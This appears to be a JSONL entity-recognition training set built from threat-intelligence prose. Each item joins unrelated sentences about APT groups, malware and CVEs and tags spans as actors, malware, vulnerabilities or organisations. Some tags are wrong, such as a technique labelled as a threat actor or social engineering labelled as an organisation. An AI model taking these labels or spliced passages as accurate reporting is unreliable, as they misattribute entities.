{"text": "APT15 is known for committing cyberespionage against companies and organizations located in many different countries , targeting different sectors such as the oil industry , government contractors , military , and more . Over the months following the elections , the accounts of Iranians that had been compromised by the actors were then used for spreading the malware .", "spans": {"THREAT_ACTOR: APT15": [[0, 5]], "THREAT_ACTOR: cyberespionage": [[30, 44]], "ORGANIZATION: oil industry": [[159, 171]], "ORGANIZATION: government contractors": [[174, 196]], "ORGANIZATION: military": [[199, 207]], "ORGANIZATION: Iranians": [[279, 287]]}, "info": {"id": "cyberner_stix_train_003374", "source": "cyberner_stix_train"}}
{"text": "As the code snippet shows , the malware creates a notification builder and then does the following : setCategory ( “ call ” ) – This means that the notification is built as a very important notification that needs special privilege . Honeybee attacked beyond the borders of South Korea to target Vietnam , Singapore , Argentina , Japan , Indonesia , and Canada . ( On hosts of interest , Agrius deploys its own custom malware a .NET backdoor called IPsec Helper , which registers itself as a service to establish persistence .", "spans": {"THREAT_ACTOR: Honeybee": [[234, 242]], "THREAT_ACTOR: Agrius": [[388, 394]], "MALWARE: malware": [[418, 425]], "MALWARE: called IPsec Helper": [[442, 461]]}, "info": {"id": "cyberner_stix_train_003375", "source": "cyberner_stix_train"}}
{"text": "The Flash zero-day exploit ( CVE-2015-5119 ) was added into the Angler Exploit Kit and Nuclear Exploit Pack . The Cobalt started its high-tech criminal activities in late 2013 by launching the Anunak malware campaign that targeted financial transfers and ATM networks of financial institutions around the world . some functions in the ANEL sample have multiple control dispatchers . None Use of Python for malware development and/or packaging : We expect to continue to observe attackers compiling or packaging their OT malware via methods such as PyInstaller ( IRONGATE ) or Py2Exe ( TRITON ) given the proliferation of OT malware developed or packaged using Python in recent years .", "spans": {"SYSTEM: Flash": [[4, 9]], "VULNERABILITY: CVE-2015-5119": [[29, 42]], "MALWARE: Angler Exploit Kit": [[64, 82]], "MALWARE: Nuclear Exploit Pack": [[87, 107]], "THREAT_ACTOR: Cobalt": [[114, 120]], "ORGANIZATION: financial institutions": [[271, 293]], "TOOL: Python": [[395, 401], [660, 666]], "THREAT_ACTOR: attackers": [[478, 487]], "MALWARE: OT malware": [[517, 527], [621, 631]], "TOOL: PyInstaller": [[548, 559]], "MALWARE: IRONGATE": [[562, 570]], "TOOL: Py2Exe": [[576, 582]], "MALWARE: TRITON": [[585, 591]]}, "info": {"id": "cyberner_stix_train_003376", "source": "cyberner_stix_train"}}
{"text": "Payload deployment Once the static block execution is complete , the Android Lifecycle callback transfers the control to the OnCreate method of the main class . APT15 was targeting information related to UK government departments and military technology . After the first EOCD comes some extra data – another ZIP file . Initially engaged in espionage activity , Agrius deployed a set of destructive wiper attacks against Israeli targets , masquerading the activity as ransomware attacks .", "spans": {"SYSTEM: Android Lifecycle": [[69, 86]], "THREAT_ACTOR: APT15": [[161, 166]], "ORGANIZATION: government": [[207, 217]], "ORGANIZATION: military technology": [[234, 253]], "THREAT_ACTOR: Agrius": [[362, 368]], "ORGANIZATION: Israeli targets": [[421, 436]]}, "info": {"id": "cyberner_stix_train_003377", "source": "cyberner_stix_train"}}
{"text": "But according to Gnosticplayers , his foray into a public marketplace like Dream has two goals --besides the first and obvious one being money . SPEAR identified recent PassCV samples which implemented another commercial off-the-shelf ( COTS ) RAT called Netwire .", "spans": {"ORGANIZATION: SPEAR": [[145, 150]], "MALWARE: PassCV samples": [[169, 183]], "MALWARE: RAT": [[244, 247]], "MALWARE: Netwire": [[255, 262]]}, "info": {"id": "cyberner_stix_train_003379", "source": "cyberner_stix_train"}}
{"text": "Both groups can set permissions on specific files to Everyone , and work in tandem with the PLATINUM backdoors . Recently , the JPCERT published a thorough analysis of the Plead backdoor , which , according to Trend Micro , is used by the cyberespionage group BlackTech .", "spans": {"THREAT_ACTOR: groups": [[5, 11]], "TOOL: PLATINUM backdoors": [[92, 110]], "ORGANIZATION: JPCERT": [[128, 134]], "MALWARE: Plead backdoor": [[172, 186]], "ORGANIZATION: Trend Micro": [[210, 221]]}, "info": {"id": "cyberner_stix_train_003380", "source": "cyberner_stix_train"}}
{"text": "Metasploit is an open source framework popular as a tool for developing and executing exploit code against a remote target machine .", "spans": {"TOOL: Metasploit": [[0, 10]]}, "info": {"id": "cyberner_stix_train_003381", "source": "cyberner_stix_train"}}
{"text": "Another common step taken by threat actors is changing their system's MAC Address to avoid being uniquely identified . Since at least 2014 , APT32 , also known as the OceanLotus Group , has targeted foreign corporations with investments in Vietnam , foreign governments , journalists , and Vietnamese dissidents .", "spans": {"THREAT_ACTOR: actors": [[36, 42]], "THREAT_ACTOR: APT32": [[141, 146]], "THREAT_ACTOR: OceanLotus Group": [[167, 183]], "ORGANIZATION: foreign corporations": [[199, 219]], "ORGANIZATION: foreign governments": [[250, 269]], "ORGANIZATION: journalists": [[272, 283]], "ORGANIZATION: dissidents": [[301, 311]]}, "info": {"id": "cyberner_stix_train_003382", "source": "cyberner_stix_train"}}
{"text": "It is very easy to trick victims to fall for such attacks . Further analysis showed that the Iron cybercrime group used two main functions from HackingTeam's source in both IronStealer and Iron ransomware . Group5 is a threat group with a suspected Iranian nexus , though this attribution is not definite .", "spans": {"THREAT_ACTOR: Iron": [[93, 97]], "TOOL: IronStealer": [[173, 184]], "TOOL: Iron ransomware": [[189, 204]], "THREAT_ACTOR: Group5": [[207, 213]]}, "info": {"id": "cyberner_stix_train_003383", "source": "cyberner_stix_train"}}
{"text": "Most attackers target vulnerable applications and operating systems .", "spans": {"TOOL: operating systems": [[50, 67]]}, "info": {"id": "cyberner_stix_train_003384", "source": "cyberner_stix_train"}}
{"text": "The Arabic-language text and English translation of the document are available in ThreatConnect here .", "spans": {"ORGANIZATION: ThreatConnect": [[82, 95]]}, "info": {"id": "cyberner_stix_train_003385", "source": "cyberner_stix_train"}}
{"text": "And our researchers estimate that in every 10 Android users 1 was attacked by either one or several of those Trojans during the second half of 2015 , so there are millions of devices with a huge possibility of being infected with Triada . WannaCry incorporated the leaked EternalBlue exploit that used two known vulnerabilities in Windows CVE-2017-0144 and CVE-2017-0145 to turn the ransomware into a worm , capable of spreading itself to any unpatched computers on the victim's network and also to other vulnerable computers connected to the internet . We assess that APT34 works on behalf of the Iranian government based on infrastructure details that contain references to Iran , use of Iranian infrastructure , and targeting that aligns with nation-state interests .", "spans": {"SYSTEM: Android": [[46, 53]], "MALWARE: Triada": [[230, 236]], "VULNERABILITY: CVE-2017-0144": [[339, 352]], "VULNERABILITY: CVE-2017-0145": [[357, 370]], "THREAT_ACTOR: APT34": [[569, 574]]}, "info": {"id": "cyberner_stix_train_003386", "source": "cyberner_stix_train"}}
{"text": "Timeline of posts related to the Hacking Team DATE UPDATE July 5 The Italian company Hacking Team was hacked , with more than 400GB of confidential company data made available to the public . Since 2013 , the Cobalt have attempted to attack banks and financial institutions using pieces of malware they designed . it attempts to guess the next block number based on the address , This actor uses these vulnerabilities to deploy webshells including CHINACHOP .", "spans": {"ORGANIZATION: Hacking Team": [[85, 97]], "THREAT_ACTOR: Cobalt": [[209, 215]], "ORGANIZATION: banks": [[241, 246]], "ORGANIZATION: financial institutions": [[251, 273]], "MALWARE: CHINACHOP": [[448, 457]]}, "info": {"id": "cyberner_stix_train_003387", "source": "cyberner_stix_train"}}
{"text": "Leveraging this intelligence allowed us to begin predicting potential C2 domains that would eventually be used by the Sofacy group .", "spans": {"TOOL: C2": [[70, 72]], "THREAT_ACTOR: Sofacy": [[118, 124]]}, "info": {"id": "cyberner_stix_train_003388", "source": "cyberner_stix_train"}}
{"text": "Our Investigation into both clusters further showed that they were both involved in attacks targeting organizations in South East Asia . Based on this , we believe the Rancor attackers were targeting political entities .", "spans": {"THREAT_ACTOR: Rancor": [[168, 174]], "THREAT_ACTOR: attackers": [[175, 184]], "ORGANIZATION: political entities": [[200, 218]]}, "info": {"id": "cyberner_stix_train_003389", "source": "cyberner_stix_train"}}
{"text": "Second , the app can set a custom delay between displaying ads . Analysis of the payload allowed us to confidently link this attack to an actor Kaspersky track as BlackOasis . This file drops exactly the same files than the previous campaign but the decoy document is different .", "spans": {"ORGANIZATION: Kaspersky": [[144, 153]], "THREAT_ACTOR: BlackOasis": [[163, 173]]}, "info": {"id": "cyberner_stix_train_003390", "source": "cyberner_stix_train"}}
{"text": "Older documents used by Patchwork focused on the CVE-2017-0261 vulnerability , however in late January 2018 when , paradoxically , newer documents abandoned this vulnerability to attack the older CVE-2015-2545 vulnerability . TAA not only flagged this malicious use of PsExec , it also told us what the attackers were using it for .", "spans": {"THREAT_ACTOR: Patchwork": [[24, 33]], "VULNERABILITY: CVE-2017-0261": [[49, 62]], "VULNERABILITY: CVE-2015-2545": [[196, 209]], "ORGANIZATION: TAA": [[226, 229]], "MALWARE: PsExec": [[269, 275]]}, "info": {"id": "cyberner_stix_train_003391", "source": "cyberner_stix_train"}}
{"text": "The exploitation of this vulnerability is not unique to Emissary Panda , as multiple threat groups are using this vulnerability to exploit SharePoint servers to gain initial access to targeted networks .", "spans": {"THREAT_ACTOR: Emissary Panda": [[56, 70]], "TOOL: SharePoint": [[139, 149]]}, "info": {"id": "cyberner_stix_train_003392", "source": "cyberner_stix_train"}}
{"text": "The ScarCruft APT gang has made use of a Flash zero day patched Thursday by Adobe to attack more than two dozen high-profile targets in Russia and Asia primarily . APT5 also targeted the networks of some of Southeast Asia 's major telecommunications providers with Leouncia malware .", "spans": {"VULNERABILITY: Flash zero day": [[41, 55]], "ORGANIZATION: telecommunications providers": [[231, 259]], "MALWARE: Leouncia": [[265, 273]], "MALWARE: malware": [[274, 281]]}, "info": {"id": "cyberner_stix_train_003393", "source": "cyberner_stix_train"}}
{"text": "] com hxxp : //mailsa-wqo [ . In our 2014 report , we identified APT28 as a suspected Russian government-sponsored espionage actor . To support this capability, the adversaries chose to manually craft the DNS queries and communicate directly with the controller as opposed to using existing .NET DNS . Whoever hacked Ashley Madison had access to all employee emails , but they only released Biderman ’s messages — three years worth .", "spans": {"THREAT_ACTOR: APT28": [[65, 70]], "THREAT_ACTOR: espionage actor": [[115, 130]], "FILEPATH: .NET": [[291, 295]], "ORGANIZATION: Ashley Madison": [[317, 331]]}, "info": {"id": "cyberner_stix_train_003394", "source": "cyberner_stix_train"}}
{"text": "The only difference introduced is that an event named “ WerTyQ34C ” can be signalled by the function “ NvStop ” to terminate the message loop and stop processing .", "spans": {}, "info": {"id": "cyberner_stix_train_003395", "source": "cyberner_stix_train"}}
{"text": "The a binary is a script wrapper to start run , a Perl-obfuscated script for installation of a Shellbot to gain control of the infected system .", "spans": {"TOOL: Perl-obfuscated": [[50, 65]], "MALWARE: Shellbot": [[95, 103]]}, "info": {"id": "cyberner_stix_train_003396", "source": "cyberner_stix_train"}}
{"text": "These threats are capable of opening a back door and stealing information from victims' computers . TG-3390 actors have used Java exploits in their SWCs .", "spans": {"THREAT_ACTOR: TG-3390": [[100, 107]], "TOOL: Java": [[125, 129]], "MALWARE: SWCs": [[148, 152]]}, "info": {"id": "cyberner_stix_train_003397", "source": "cyberner_stix_train"}}
{"text": "It is unclear how long the malicious code existed inside the apps , hence the actual spread of the malware remains unknown . The Winnti umbrella continues to operate highly successfully in 2018 . We will take a look at the keylogger later on . Enable robust application logging for MicroSCADA and aggregate logs to a central location .", "spans": {"TOOL: keylogger": [[223, 232]]}, "info": {"id": "cyberner_stix_train_003398", "source": "cyberner_stix_train"}}
{"text": "HummingWhale , by contrast , managed to sneak its way into about 20 Google Play apps that were downloaded from 2 million to 12 million times , according to researchers from Check Point , the security company that has been closely following the malware family for almost a year . Rather , PapaAlfa could be considered a smart proxy due in part to the fact that the Lazarus can easily switch the backend destination address and port without having to reestablish control over the infected machine hosting the PapaAlfa malware . Because the Elfin and the Shamoon attacks against this organization occurred so close together , there has been speculation that the two groups may be linked . If you can not apply the KB5019758 patch immediately , you should disable OWA until the patch can be applied .", "spans": {"MALWARE: HummingWhale": [[0, 12]], "SYSTEM: Google Play": [[68, 79]], "ORGANIZATION: Check Point": [[173, 184]], "TOOL: PapaAlfa": [[288, 296]], "THREAT_ACTOR: Lazarus": [[364, 371]], "TOOL: PapaAlfa malware": [[507, 523]], "THREAT_ACTOR: Elfin": [[538, 543]], "THREAT_ACTOR: Shamoon": [[552, 559]]}, "info": {"id": "cyberner_stix_train_003399", "source": "cyberner_stix_train"}}
{"text": "We identified decoy files which indicate these attacks began with spear phishing messages but have not observed the actual messages . Hancom Office is widely used in South Korea .", "spans": {"MALWARE: decoy files": [[14, 25]]}, "info": {"id": "cyberner_stix_train_003400", "source": "cyberner_stix_train"}}
{"text": "While one variant will use a preconfigured C&C server over HTTP or HTTPS , the other variant will use a Microsoft OneDrive account to exchange commands and stolen data with its operators .", "spans": {"TOOL: C&C": [[43, 46]], "ORGANIZATION: Microsoft": [[104, 113]], "TOOL: OneDrive": [[114, 122]]}, "info": {"id": "cyberner_stix_train_003401", "source": "cyberner_stix_train"}}
{"text": "We however feel it is unlikely that the CosmicDuke operators targeting drug dealers and those targeting governments could be two entirely independent entities .", "spans": {"MALWARE: CosmicDuke": [[40, 50]]}, "info": {"id": "cyberner_stix_train_003402", "source": "cyberner_stix_train"}}
{"text": "Before sending any data to the C2 using the trojan attempts to disguise its data , the data is serialized using JSON , which is then encoded in Base64 . After a successful phishing attack in which users have opened emails and browsed to malicious links , ITG08 attackers install the More_eggs JScript backdoor on user devices alongside several other malware components . APT38 is a financially motivated North Korean regime-backed group responsible for conducting destructive attacks against financial institutions , as well as some of the world .", "spans": {"THREAT_ACTOR: ITG08": [[255, 260]], "TOOL: More_eggs JScript backdoor": [[283, 309]], "THREAT_ACTOR: APT38": [[371, 376]], "ORGANIZATION: financial institutions": [[492, 514]]}, "info": {"id": "cyberner_stix_train_003403", "source": "cyberner_stix_train"}}
{"text": "This task proved to be nontrivial . Depending on placement , a web shell can provide continued access to victims ' environments , re-infect victim systems , and facilitate lateral movement . The data received from the C&C server is encrypted using the same key . As outlined in recent research detailing the GRU 's disruptive playbook , we have observed Sandworm adopting LotL tactics across its wider operations to similarly increase the speed and scale at which it can operate while minimizing the odds of detection .", "spans": {"THREAT_ACTOR: Sandworm": [[354, 362]]}, "info": {"id": "cyberner_stix_train_003404", "source": "cyberner_stix_train"}}
{"text": "APT28 espionage activity has primarily targeted entities in the U.S. , Europe , and the countries of the former Soviet Union , including governments and militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian Government . In addition to these , we also identified \" Macfog \" , a native Mac OS X implementation of Icefog that infected several hundred victims worldwide .", "spans": {"ORGANIZATION: governments": [[137, 148]], "ORGANIZATION: militaries": [[153, 163]], "ORGANIZATION: defense attaches": [[166, 182]], "ORGANIZATION: media entities": [[185, 199]], "ORGANIZATION: dissidents": [[206, 216]], "ORGANIZATION: figures": [[221, 228]], "MALWARE: Macfog": [[317, 323]], "MALWARE: native Mac OS X implementation": [[330, 360]], "MALWARE: Icefog": [[364, 370]]}, "info": {"id": "cyberner_stix_train_003405", "source": "cyberner_stix_train"}}
{"text": "Deserialize the decrypted response into another client response object .", "spans": {}, "info": {"id": "cyberner_stix_train_003406", "source": "cyberner_stix_train"}}
{"text": "Analysis of the Royal Road weaponizer has resulted in the discovery that multiple Chinese threat groups started utilizing CVE-2018-0798 in their RTF weaponizer . Our initial observation of the Bahamut group originated from in-the-wild attempts to deceive targets into providing account passwords through impersonation of platform providers .", "spans": {"THREAT_ACTOR: threat groups": [[90, 103]], "VULNERABILITY: CVE-2018-0798": [[122, 135]], "TOOL: RTF weaponizer": [[145, 159]], "ORGANIZATION: platform providers": [[321, 339]]}, "info": {"id": "cyberner_stix_train_003407", "source": "cyberner_stix_train"}}
{"text": "\" WzI3MDg5LDI4NjE4LDk4MzMsNDE3MCwyNTcyMiwxOTk3NywyMzY5LDIxNDI2LDM0MzUsNzQ0MiwzMDE0NiwyMTcxOSwxNjE0MCwxNjI4MCwxNjY4OCwyMjU1MCwxOTg2NywxOTQsMzI5OF0= \" .", "spans": {}, "info": {"id": "cyberner_stix_train_003408", "source": "cyberner_stix_train"}}
{"text": "as the user agent , while more recent samples use “ OPAERA ”", "spans": {}, "info": {"id": "cyberner_stix_train_003409", "source": "cyberner_stix_train"}}
{"text": "We believe this backdoor is relatively new and seems to have appeared starting in the beginning of 2019 .", "spans": {}, "info": {"id": "cyberner_stix_train_003410", "source": "cyberner_stix_train"}}
{"text": "ACCESS_NETWORK_STATE - Allows the application to access information about networks . However , this action doesn’t appear to have made a dent in the cybercriminal organization , as subsequent spear-phishing campaigns seem to have been reported from March until May 2018 . As we continued to investigate , it became apparent that Gorgon Group had been consistently targeting worldwide governmental organizations operating within Pakistan .", "spans": {"THREAT_ACTOR: Gorgon Group": [[329, 341]], "ORGANIZATION: governmental organizations": [[384, 410]]}, "info": {"id": "cyberner_stix_train_003411", "source": "cyberner_stix_train"}}
{"text": "In most cases , LEAD ’s attacks do not feature any advanced exploit techniques .", "spans": {"THREAT_ACTOR: LEAD": [[16, 20]]}, "info": {"id": "cyberner_stix_train_003412", "source": "cyberner_stix_train"}}
{"text": "In addition , the malware can log in to the attacker ’ s email inbox , parse emails in a special folder for commands and save any payloads to a device from email attachments . This campaign is tailored to identifying those who are running Bitcoin related software through specific system scans . A second JavaScript command was also executed , which created a scheduled task to execute chfeeds.vbe multiple times a day . Mandiant has previously identified the domain wasxxv[.]site being used by North Korean threat actors .", "spans": {"FILEPATH: chfeeds.vbe": [[386, 397]], "THREAT_ACTOR: North Korean threat actors": [[495, 521]]}, "info": {"id": "cyberner_stix_train_003413", "source": "cyberner_stix_train"}}
{"text": "Several analysis reports were published on this malware in 2014 and , finally , the source code was leaked in 2015 . Since at least 2008 , The Lamberts have used multiple sophisticated attack tools against high-profile victims . Some of the campaign codes we have seen include : CRML_0505 , CRML_MIL , Firebox4 , JUST_0525 , ML0628 , MW0629 , OM222 . Our demonstration shows how using the Google Analytics API , a web skimmer can send data to be collected in his own account instance .", "spans": {"TOOL: Lamberts": [[143, 151]], "MALWARE: CRML_0505": [[279, 288]], "MALWARE: CRML_MIL": [[291, 299]], "MALWARE: Firebox4": [[302, 310]], "MALWARE: JUST_0525": [[313, 322]], "MALWARE: ML0628": [[325, 331]], "MALWARE: MW0629": [[334, 340]], "MALWARE: OM222": [[343, 348]], "SYSTEM: Google Analytics API": [[389, 409]], "THREAT_ACTOR: a web skimmer": [[412, 425]]}, "info": {"id": "cyberner_stix_train_003414", "source": "cyberner_stix_train"}}
{"text": "Adobe on Thursday patched a zero-day vulnerability in Flash Player that has been used in targeted attacks carried out by a new APT group operating primarily against high-profile victims in Russia and Asia . We suspect that the group sought access to these networks to obtain information that would enable it to monitor communications passing through the providers' systems .", "spans": {"VULNERABILITY: zero-day vulnerability": [[28, 50]]}, "info": {"id": "cyberner_stix_train_003415", "source": "cyberner_stix_train"}}
{"text": "So far , this software ( along with the Android version ) has been made available through phishing sites that imitated Italian and Turkmenistani mobile carriers . WannaCry utilizes EternalBlue by crafting a custom SMB session request with hard-coded values based on the target system . The new spear-phishing docs used by MuddyWater rely on social engineering to persuade users to enable macros .", "spans": {"SYSTEM: Android": [[40, 47]], "TOOL: WannaCry": [[163, 171]], "VULNERABILITY: EternalBlue": [[181, 192]], "TOOL: SMB": [[214, 217]], "THREAT_ACTOR: MuddyWater": [[322, 332]], "ORGANIZATION: social engineering": [[341, 359]]}, "info": {"id": "cyberner_stix_train_003416", "source": "cyberner_stix_train"}}
{"text": "For the .NET version , the following registry key and value are used for persistence :", "spans": {"TOOL: .NET": [[8, 12]]}, "info": {"id": "cyberner_stix_train_003417", "source": "cyberner_stix_train"}}
{"text": "We have directly observed multiple copies of Exodus with more than 50 installs and we can estimate the total number of infections to amount in the several hundreds , if not a thousand or more . While continuing research on the August 2018 attacks on a Middle eastern government that delivered BONDUPDATER , Unit 42 researchers observed OilRig 's testing activities and with high confidence links this testing to the creation of the weaponized delivery document used in this attack . The actor used the same technique in the macro and in the JhoneRAT . A main goal of this attack was to obtain access to email accounts .", "spans": {"MALWARE: Exodus": [[45, 51]], "ORGANIZATION: government": [[267, 277]], "TOOL: BONDUPDATER": [[293, 304]], "ORGANIZATION: Unit 42": [[307, 314]], "THREAT_ACTOR: OilRig": [[336, 342]], "TOOL: macro": [[524, 529]], "MALWARE: JhoneRAT": [[541, 549]]}, "info": {"id": "cyberner_stix_train_003418", "source": "cyberner_stix_train"}}
{"text": "Signing malware with code-signing certificates is becoming more common , as seen in this investigation and the other attacks we have discussed .", "spans": {}, "info": {"id": "cyberner_stix_train_003419", "source": "cyberner_stix_train"}}
{"text": "Threat actors may use the date string hardcoded into each Bookworm sample as a build identifier . This threat is another proof point that attackers are clearly incorporating the mobile device into their surveillance campaigns as a primary attack vector .", "spans": {"MALWARE: date string hardcoded": [[26, 47]], "TOOL: Bookworm sample": [[58, 73]], "MALWARE: mobile device": [[178, 191]]}, "info": {"id": "cyberner_stix_train_003420", "source": "cyberner_stix_train"}}
{"text": "While there have been several Suckfly campaigns that infected organizations with the group ’s custom malware Backdoor.Nidiran , the Indian targets show a greater amount of post-infection activity than targets in other regions .", "spans": {"THREAT_ACTOR: Suckfly": [[30, 37]], "MALWARE: Backdoor.Nidiran": [[109, 125]]}, "info": {"id": "cyberner_stix_train_003421", "source": "cyberner_stix_train"}}
{"text": "2016 We do not know exactly how many people have been infected with RuMMS malware ; however , our data suggests that there are at least 2,729 infections with RuMMS samples from January 2016 to early April 2016 . In the January 16 , 2018 attack , we observed OilRig attacking an organization it previously targeted in January 2017 . The purpose is to download an image from a new Google Drive link . These types of threat actors will be attempting to cause the most embarrassment andor pain to prove the company can not function without them .", "spans": {"MALWARE: RuMMS": [[68, 73], [158, 163]]}, "info": {"id": "cyberner_stix_train_003422", "source": "cyberner_stix_train"}}
{"text": "Shamoon2 : 69.87.223.26:8080/eiloShaegae1 .", "spans": {"MALWARE: Shamoon2": [[0, 8]], "DOMAIN: 69.87.223.26:8080/eiloShaegae1": [[11, 41]]}, "info": {"id": "cyberner_stix_train_003423", "source": "cyberner_stix_train"}}
{"text": "At the time of analysis , the subdomains did not host a website; however , based on BITTER APT group’s targeting patterns , it is highly likely that they were created to host faux login phishing pages designed to steal user’s credentials . Hackers first actively spread bots using the Niteris exploit , and then search for infected devices at banks amongst their bots by analyzing IP addresses , cracked passwords and results of the modules performance .", "spans": {"THREAT_ACTOR: BITTER APT": [[84, 94]], "TOOL: Niteris": [[285, 292]], "VULNERABILITY: exploit": [[293, 300]], "ORGANIZATION: banks": [[343, 348]]}, "info": {"id": "cyberner_stix_train_003424", "source": "cyberner_stix_train"}}
{"text": "Extract call logs , contacts and messages from the Skype app . the group 's targets include an organization in Sweden . Using Geopolitically-charged Lure Content : The attackers use specially crafted lure content to trick their targets into opening malicious files that infect the victim ’s machine with the Pierogi backdoor . The name “ Anonymous Sudan ” is likely an attempted appropriation of the brand of the well - known hacktivist collective “ Anonymous , ” similar to another KillNet affiliate , “ Anonymous Russia . ”", "spans": {"SYSTEM: Skype": [[51, 56]], "MALWARE: Pierogi backdoor": [[308, 324]], "THREAT_ACTOR: Anonymous Sudan": [[338, 353]], "THREAT_ACTOR: Anonymous Russia": [[505, 521]]}, "info": {"id": "cyberner_stix_train_003425", "source": "cyberner_stix_train"}}
{"text": "W:\\Visual Studio 2017\\Spark4.2\\Release\\Spark4.2.pdb .", "spans": {"FILEPATH: W:\\Visual Studio 2017\\Spark4.2\\Release\\Spark4.2.pdb": [[0, 51]]}, "info": {"id": "cyberner_stix_train_003426", "source": "cyberner_stix_train"}}
{"text": "“ Agent Smith ” itself , though , seems to target mainly India users . Overall , the Bookworm infrastructure overlaps with the infrastructure hosting C2 servers used by various attack tools , including FFRAT , Poison Ivy , PlugX , and others . Over time , Dexphot-related malicious behavior reports dropped to a low hum , as the threat lost steam . Encrypted Channel APT29 has used multiple layers of encryption within malware to protect C2 communication .", "spans": {"MALWARE: Agent Smith": [[2, 13]], "TOOL: Bookworm": [[85, 93]], "TOOL: FFRAT": [[202, 207]], "TOOL: Poison Ivy": [[210, 220]], "TOOL: PlugX": [[223, 228]], "THREAT_ACTOR: APT29": [[367, 372]]}, "info": {"id": "cyberner_stix_train_003427", "source": "cyberner_stix_train"}}
{"text": "We believe this spyware platform is developed by an Italian company called eSurv , which primarily operates in the business of video surveillance . POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 . This RAT uses three different cloud services to perform all its command and control ( C2 ) activities . The attackers only managed to deploy it to three machines on the organizations network and it was blocked on two of those three computers .", "spans": {"ORGANIZATION: eSurv": [[75, 80]], "TOOL: POWRUNER": [[148, 156]], "TOOL: malicious RTF": [[179, 192]], "VULNERABILITY: CVE-2017-0199": [[213, 226]], "TOOL: RAT": [[234, 237]], "TOOL: command and control": [[293, 312]], "TOOL: C2": [[315, 317]], "THREAT_ACTOR: The attackers": [[333, 346]]}, "info": {"id": "cyberner_stix_train_003428", "source": "cyberner_stix_train"}}
{"text": "In 2013 , many of the decoy documents employed by the Dukes in their campaigns were related to Ukraine ; examples include a letter undersigned by the First Deputy Minister for Foreign Affairs of Ukraine , a letter from the embassy of the Netherlands in Ukraine to the Ukrainian Ministry of Foreign affairs and a document titled “ Ukraine ’s Search for a Regional Foreign Policy ” .", "spans": {"THREAT_ACTOR: Dukes": [[54, 59]], "ORGANIZATION: Foreign Affairs": [[176, 191]], "ORGANIZATION: Ukrainian Ministry": [[268, 286]], "ORGANIZATION: Foreign affairs": [[290, 305]]}, "info": {"id": "cyberner_stix_train_003429", "source": "cyberner_stix_train"}}
{"text": "How to unblock the phone Now for some good news : Rotexy doesn ’ t have a very well-designed module for processing commands that arrive in SMSs . If the document was delivered with macros instead of exploits ( CVE-2012-0158 , CVE-2013-3906 or CVE-2014-1761 ) , then the document contained instructions for enabling macros . The period between November 2014 and January 2015 marked one of the earlier instances in which Proofpoint observed persistent exploitation attempts by this actor .", "spans": {"MALWARE: Rotexy": [[50, 56]], "MALWARE: document": [[153, 161]], "VULNERABILITY: CVE-2012-0158": [[210, 223]], "VULNERABILITY: CVE-2013-3906": [[226, 239]], "VULNERABILITY: CVE-2014-1761": [[243, 256]], "ORGANIZATION: Proofpoint": [[419, 429]], "THREAT_ACTOR: actor": [[480, 485]]}, "info": {"id": "cyberner_stix_train_003430", "source": "cyberner_stix_train"}}
{"text": "The Sednit group – also known as APT28 , Fancy Bear , Sofacy or STRONTIUM – has been operating since at least 2004 and has made headlines frequently in past years .", "spans": {"THREAT_ACTOR: Sednit": [[4, 10]], "THREAT_ACTOR: APT28": [[33, 38]], "THREAT_ACTOR: Fancy Bear": [[41, 51]], "THREAT_ACTOR: Sofacy": [[54, 60]], "THREAT_ACTOR: STRONTIUM": [[64, 73]]}, "info": {"id": "cyberner_stix_train_003431", "source": "cyberner_stix_train"}}
{"text": "The ScarCruft group keeps expanding its exfiltration targets to steal further information from infected hosts and continues to create tools for additional data exfiltration . this SWC was used to specifically target Turkish banking .", "spans": {"THREAT_ACTOR: ScarCruft": [[4, 13]], "ORGANIZATION: banking": [[224, 231]]}, "info": {"id": "cyberner_stix_train_003432", "source": "cyberner_stix_train"}}
{"text": "While no phishing- or social engineering-initiated routines were observed in this campaign , we found multiple attacks over the network that are considered “ loud. ” These involved large-scale scanning operations of IP ranges intentionally launched from the command and control ( C&C ) server .", "spans": {"TOOL: command and control": [[258, 277]], "TOOL: C&C": [[280, 283]]}, "info": {"id": "cyberner_stix_train_003433", "source": "cyberner_stix_train"}}
{"text": "The purpose of the attacks appears to be industrial espionage , collecting intellectual property for competitive advantage .", "spans": {}, "info": {"id": "cyberner_stix_train_003434", "source": "cyberner_stix_train"}}
{"text": "If that part is found , the app loads Javascript snippets from the JSON parameters to click a button or other HTML element , simulating a real user click . NetTraveler has been used to target diplomats , embassies and government institutions for over a decade , and remains the tool of choice by the adversaries behind these cyber espionage campaigns . The Chinese government would benefit from improved insight into local media coverage of Taiwanese politics , both to better anticipate the election outcome and to gather additional intelligence on politicians , activists , and others who interact with journalists . Popular tax preparation software companies are under fire from lawmakers for allegedly sharing personal information with social media sites , including Google and Meta .", "spans": {"TOOL: NetTraveler": [[156, 167]], "ORGANIZATION: diplomats": [[192, 201]], "ORGANIZATION: embassies": [[204, 213]], "ORGANIZATION: government institutions": [[218, 241]], "ORGANIZATION: Chinese government": [[357, 375]], "ORGANIZATION: Popular tax preparation software companies": [[619, 661]], "ORGANIZATION: lawmakers": [[682, 691]], "TOOL: Google": [[771, 777]], "TOOL: Meta": [[782, 786]]}, "info": {"id": "cyberner_stix_train_003435", "source": "cyberner_stix_train"}}
{"text": "The official “ Golden Cup ” Facebook page . FireEye assesses that APT32 leverages a unique suite of fully-featured malware , in conjunction with commercially-available tools , to conduct targeted operations that are aligned with Vietnamese state interests . The information for this specific sample is listed below . Talos researchers recently discovered multiple vulnerabilities in Open Babel , an open - source software library used in a variety of chemistry and research settings .", "spans": {"MALWARE: Golden Cup": [[15, 25]], "SYSTEM: Facebook": [[28, 36]], "ORGANIZATION: FireEye": [[44, 51]], "THREAT_ACTOR: APT32": [[66, 71]], "ORGANIZATION: Talos researchers": [[317, 334]], "TOOL: Open Babel": [[383, 393]]}, "info": {"id": "cyberner_stix_train_003436", "source": "cyberner_stix_train"}}
